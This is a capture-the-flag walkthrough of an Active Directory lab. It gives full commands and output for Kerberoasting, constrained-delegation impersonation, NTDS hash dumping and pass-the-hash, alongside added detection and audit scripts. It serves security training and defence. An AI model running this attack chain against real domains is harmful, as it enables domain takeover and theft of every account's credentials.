Crocc Crew — Hack Back
The Crocc Crew has already compromised a Cooctus Corp Domain Controller. Our mission: reverse-engineer their attack path by enumerating the compromised DC, cracking Kerberos service tickets, abusing constrained delegation with protocol transition, and achieving full domain takeover.
Attack Flow Overview
This room simulates a scenario where an attacker group called "Crocc Crew" has already placed a backdoor on a Cooctus Corp Domain Controller. Starting from a segmented network position with only the DC visible, we must trace the attackers' footsteps, discover their credentials, and ultimately compromise the domain to find all the flags they left behind. The challenge teaches a complete Active Directory attack chain from enumeration through Kerberoasting to constrained delegation abuse and full domain compromise.
- The target is a Windows Domain Controller in the COOCTUS.CORP domain
- The credentials Visitor:GuestLogin! grant limited SMB and LDAP access
- The password-reset service account has constrained delegation with protocol transition
- Constrained delegation targets the non-standard SPN oakley/DC.COOCTUS.CORP
Network Reconnaissance
Starting with a full port scan using RustScan piped into Nmap for service detection and script scanning. The target at 10.10.175.192 reveals a classic Windows Domain Controller fingerprint with DNS, Kerberos, LDAP, SMB, and RPC services all exposed.
rustscan -a 10.10.175.192 --ulimit 5500 -b 65535 -- -A -Pn
The scan reveals 17 open ports confirming this is a Domain Controller for the COOCTUS.CORP domain. Key services identified include DNS (53), IIS HTTP (80), Kerberos (88), MSRPC (135), NetBIOS (139), LDAP (389/3268), SMB (445), and WinRM (5985 implied). The RDP NTLM info leak confirms the hostname is DC in the COOCTUS domain with Windows Server 2019 (Build 17763).
The rdp-ntlm-info NSE script leaks the NetBIOS name (DC), DNS name (DC.COOCTUS.CORP), and OS build (10.0.17763 = Server 2019) without authentication. Always run this script against exposed RDP ports.
Web Enumeration
The IIS web server on port 80 hosts a page with a terminal emulator featuring the Crocc Crew branding. The crucial discovery comes from checking robots.txt, which reveals two hidden paths that the attackers left behind.
User-Agent: *
Disallow: /robots.txt
Disallow: /db-config.bak
Disallow: /backdoor.php
The /db-config.bak file contains a PHP database configuration backup with hardcoded credentials. This is a critical find that reveals database connection details the Crocc Crew likely used during their initial compromise.
<?php
$servername = "db.cooctus.corp";
$username = "C00ctusAdm1n";
$password = "B4dt0th3b0n3";
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    die("Connection Failed: " . $conn->connect_error);
}
echo "Connected Successfully";
?>
The main page also contains a JavaScript terminal emulator with the Crocc Crew greeting "CroccCrew >:)", confirming this is their backdoor. The /backdoor.php endpoint likely serves as their command interface, though direct access doesn't reveal much without the proper authentication or parameters.
The credentials C00ctusAdm1n:B4dt0th3b0n3 belong to the database server and are not directly usable for AD authentication. However, the password pattern suggests reuse may be possible elsewhere in the environment.
SMB Enumeration — Visitor Access
Anonymous RPC access is denied (NT_STATUS_ACCESS_DENIED), although some privilege information can still be enumerated. The real breakthrough comes from SMB access with the Visitor account: testing common guest passwords eventually yields access with Visitor:GuestLogin!.
smbclient -L //10.10.175.192 -U "Visitor"
The share listing reveals several interesting shares including Home, ADMIN$, C$, NETLOGON, and SYSVOL. Connecting to the Home share immediately yields our first flag.
smbclient //10.10.175.192/Home -U "Visitor"
# ls
# user.txt A 17
# more user.txt
# userflag
Exploring the SYSVOL share as the Visitor user reveals the standard AD Group Policy structure with Policies and scripts directories. While the scripts folder is empty, this confirms standard AD domain configuration with potential GPO attack vectors for later escalation.
LDAP Enumeration & Domain Dump
Anonymous LDAP queries fail with "Operations error" requiring authentication. However, using the Visitor credentials we can perform a full LDAP bind and enumerate the domain. The first step is identifying the naming contexts, then dumping the full directory.
ldapsearch -x -s base namingcontexts -H ldap://10.10.175.192
# namingcontexts: DC=COOCTUS,DC=CORP
# namingcontexts: CN=Configuration,DC=COOCTUS,DC=CORP
# namingcontexts: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
ldapsearch -x -b "DC=COOCTUS,DC=CORP" \
-D "COOCTUS\Visitor" -H ldap://10.10.175.192 \
-W > ldap_crocccrew.txt
The LDAP dump reveals critical information about the domain. Most importantly, it exposes a service account named password-reset with constrained delegation configured. The msDS-AllowedToDelegateTo attribute shows this account can delegate to multiple SPNs under the oakley service type.
sAMAccountName: password-reset
servicePrincipalName: HTTP/dc.cooctus.corp
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP/COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP/COOCTUS
msDS-AllowedToDelegateTo: oakley/DC/COOCTUS
Using ldapdomaindump provides a more structured view of all domain users and groups. The dump reveals approximately 17 domain user accounts including admCroccCrew (a likely attacker-created admin account), standard employee names, and the critical password-reset service account with delegation rights.
ldapdomaindump 10.10.175.192 -u "COOCTUS\Visitor" -p 'GuestLogin!'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Constrained delegation with protocol transition (S4U2Self + S4U2Proxy) allows the password-reset account to impersonate ANY user (including Administrator) to the delegated service. This is one of the most dangerous AD misconfigurations because it enables privilege escalation without needing the target user's password.
Kerberoasting — Cracking the Service Ticket
With the Visitor account's credentials, we can request service tickets for accounts with registered SPNs. The GetUserSPNs tool from Impacket automates this by requesting a TGS ticket for the password-reset account and extracting the encrypted portion for offline cracking.
impacket-GetUserSPNs COOCTUS.CORP/Visitor:GuestLogin! \
-request -dc-ip 10.10.175.192
ServicePrincipalName Name MemberOf Delegation
-------------------- -------------- -------- -----------
HTTP/dc.cooctus.corp password-reset constrained
The output confirms the password-reset account has constrained delegation and provides the TGS hash. We save this hash to a file and crack it using John the Ripper with the rockyou wordlist. The password is recovered almost instantly.
john --wordlist=/usr/share/wordlists/rockyou.txt hash_crocc
resetpassword (?)
1g 0:00:00:00 DONE
The password for the password-reset account is resetpassword — a delightfully ironic choice given the account's name. With these credentials in hand, we now have access to a service account configured with constrained delegation, which is our escalation path to domain admin.
COOCTUS.CORP/password-reset:resetpassword — Service account with constrained delegation to oakley/DC.COOCTUS.CORP with protocol transition enabled.
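From the defender's side, the TGS request that GetUserSPNs makes above is visible in the DC's security log as event 4769. The following detection logic is an added example (not part of the writeup or of Impacket) run over constructed, flattened 4769 records; the field names follow the event's EventData, and the sample values are invented for illustration.

```python
import re
from collections import defaultdict

# Constructed, flattened 4769 (Kerberos service ticket requested) records,
# not logs taken from the room. Field names follow the event's EventData.
# 0x17 = RC4-HMAC (the etype Kerberoasting tools commonly request because the
# resulting ticket is cheapest to crack), 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_4769 = [
    "TargetUserName=Visitor@COOCTUS.CORP ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "TargetUserName=Visitor@COOCTUS.CORP ServiceName=password-reset TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "TargetUserName=Visitor@COOCTUS.CORP ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "TargetUserName=employee1@COOCTUS.CORP ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.20.7",
]

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened key=value record into a dict."""
    return dict(FIELD.findall(line))


def is_roast_candidate(ev):
    """RC4 service ticket for a user-owned service account.

    Machine accounts (trailing $) and krbtgt have random passwords and are not
    worth cracking, so a weak-etype ticket for them is normal noise. A ticket
    for a human-managed account such as password-reset is the signal.
    """
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == "0x17"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoasting(lines):
    """Map (requesting user, source IP) -> sorted service accounts it roasted."""
    hits = defaultdict(set)
    for ev in map(parse_event, lines):
        if is_roast_candidate(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in hits.items()}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoasting(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Restricting service accounts to AES (msDS-SupportedEncryptionTypes) removes the RC4 signal and the cheap crack at the same time; a long random password or a gMSA removes the crack entirely.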
Constrained Delegation Abuse (S4U)
Before exploiting the delegation, we first confirm the exact delegation configuration using Impacket's findDelegation tool. This reveals the full scope of what the password-reset account is trusted to delegate to, and critically, whether protocol transition is enabled.
impacket-findDelegation COOCTUS.CORP/password-reset:resetpassword \
-dc-ip 10.10.175.192
AccountName DelegationType DelegationRightsTo
-------------- ---------------------------------- -------------------
password-reset Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS.CORP
password-reset Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP
password-reset Constrained w/ Protocol Transition oakley/DC
password-reset Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS
password-reset Constrained w/ Protocol Transition oakley/DC/COOCTUS
The key phrase here is "Constrained w/ Protocol Transition". This means the account can use S4U2Self to get a forwardable TGS for itself on behalf of any user, then use S4U2Proxy to exchange that for a service ticket to the delegated SPN — all without knowing the impersonated user's password. We exploit this by requesting a ticket for the Administrator account.
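The delegation type findDelegation prints is derived from two userAccountControl bits together with msDS-AllowedToDelegateTo, the same attributes the raw ldapsearch dump exposed earlier. The audit below is an added example (not the writeup's code and not Impacket's) that reproduces that classification over a constructed LDIF fragment modelled on the dump; the userAccountControl values are assumed, since the room's dump does not show them, and the DC$ entry is invented to show the unconstrained case.

```python
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self)

# Constructed LDIF modelled on the room's ldapsearch output. userAccountControl
# is assumed: 16777728 = NORMAL_ACCOUNT (0x200) | TRUSTED_TO_AUTH_FOR_DELEGATION,
# 532480 = SERVER_TRUST_ACCOUNT (0x2000) | TRUSTED_FOR_DELEGATION (a typical DC).
SAMPLE_LDIF = """\
dn: CN=password-reset,CN=Users,DC=COOCTUS,DC=CORP
sAMAccountName: password-reset
userAccountControl: 16777728
servicePrincipalName: HTTP/dc.cooctus.corp
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP/COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC

dn: CN=Visitor,CN=Users,DC=COOCTUS,DC=CORP
sAMAccountName: Visitor
userAccountControl: 512

dn: CN=DC,OU=Domain Controllers,DC=COOCTUS,DC=CORP
sAMAccountName: DC$
userAccountControl: 532480
"""


def parse_ldif(text):
    """Split LDIF into entries; each entry maps attribute -> list of values."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(": ")
        current.setdefault(key, []).append(value)
    if current:
        entries.append(current)
    return entries


def classify_delegation(entry):
    """Return (delegation type, targets) the way findDelegation reports them."""
    uac = int(entry.get("userAccountControl", ["0"])[0])
    targets = entry.get("msDS-AllowedToDelegateTo", [])
    if uac & TRUSTED_FOR_DELEGATION:
        return "Unconstrained", ["*"]
    if targets:
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "Constrained w/ Protocol Transition", targets
        return "Constrained", targets
    return None, []


def audit(text):
    """List every delegating account; flag user accounts with SPNs (roastable)."""
    findings = []
    for e in parse_ldif(text):
        kind, targets = classify_delegation(e)
        if kind is None:
            continue
        name = e["sAMAccountName"][0]
        roastable = not name.endswith("$") and "servicePrincipalName" in e
        findings.append({"account": name, "type": kind,
                         "targets": targets, "kerberoastable": roastable})
    return findings
```

An account that is both Kerberoastable and trusted for protocol transition is the exact chain this room abuses; the usual fixes are a strong or managed password on the service account, and marking privileged users as "sensitive and cannot be delegated" (or placing them in Protected Users) so S4U2Self cannot impersonate them.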
impacket-getST -spn oakley/DC.COOCTUS.CORP \
-impersonate Administrator \
"COOCTUS.CORP/password-reset:resetpassword" \
-dc-ip 10.10.175.192
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
The attack succeeds and produces an Administrator.ccache file containing a Kerberos service ticket that authenticates as the Domain Administrator. We set the KRB5CCNAME environment variable to point to this cache file, ensuring all subsequent Kerberos tools use the impersonated ticket.
# Add DC to hosts file for Kerberos resolution
echo "10.10.175.192 DC.COOCTUS.CORP" >> /etc/hosts
# Load the ticket into memory
export KRB5CCNAME=Administrator.ccache
# Verify ticket
klist
# Default principal: Administrator@COOCTUS.CORP
# Service: oakley/DC/COOCTUS@COOCTUS.CORP
Domain Secrets Extraction
With the Administrator's Kerberos ticket cached, we can use Impacket's secretsdump.py to remotely extract all credential material from the Domain Controller. This includes the local SAM database, LSA secrets, and the full NTDS.DIT domain password database.
secretsdump.py -k -no-pass DC.COOCTUS.CORP
The dump is comprehensive. From the local SAM we get the local Administrator hash 7dfa0531d73101ca080c7379a9bff1c7, while the NTDS.DIT extraction reveals the domain Administrator hash add41095f1fb0405b32f70a489de022d. All domain user hashes including the Crocc Crew's admCroccCrew account are exposed.
[*] Dumping Domain Credentials (DRSUAPI method)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e:::
COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1:::
COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a:::
COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c:::
Additionally, the dump extracts Kerberos encryption keys (AES256, AES128, DES) for all accounts, DPAPI backup keys, and the machine account password. This gives us persistent access even if passwords are rotated — the krbtgt hash enables Golden Ticket attacks, and the DPAPI keys can decrypt any user's stored credentials.
The krbtgt hash enables Golden Ticket creation for persistence, the Administrator NTLM hash grants instant access to any domain system via Pass-the-Hash, and the DPAPI keys unlock encrypted credentials across the forest.
Domain Admin — Shell Access
Using the Administrator NTLM hash extracted from the secrets dump, we connect to the Domain Controller via WinRM using Evil-WinRM with Pass-the-Hash authentication. No plaintext password is needed — the hash alone is sufficient for full system access.
evil-winrm -u Administrator \
-H add41095f1fb0405b32f70a489de022d \
-i 10.10.47.104
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cooctus\administrator
We have a shell as cooctus\administrator on the Domain Controller. Navigating through the file system, we find additional flags left by the Crocc Crew in the shared folders.
cd C:\Shares
ls
# Mode LastWriteTime Length Name
# ---- ------------- ------ ----
# d----- 6/8/2021 12:42PM Home
cd C:\Shares\Home
ls
# -a---- 6/8/2021 12:38PM 28 priv-esc-2.txt
# -a---- 6/7/2021 8:08PM 22 priv-esc.txt
# -a---- 6/7/2021 8:14PM 17 user.txt
The root flag is located in the C:\PerfLogs\Admin directory, a classic hiding spot for CTF challenges since it's a rarely-visited system directory.
cd C:\PerfLogs\Admin
type root.txt
Key Takeaways
- Weak service account passwords like resetpassword on password-reset make offline cracking trivial with rockyou.
- The oakley/DC.COOCTUS.CORP SPN is unusual (an IPsec/NAP service name). Don't overlook non-HTTP/LDAP SPNs as delegation targets.
- The robots.txt and db-config.bak files on IIS reveal attacker infrastructure and credentials. Always check for backup files and exposed configs.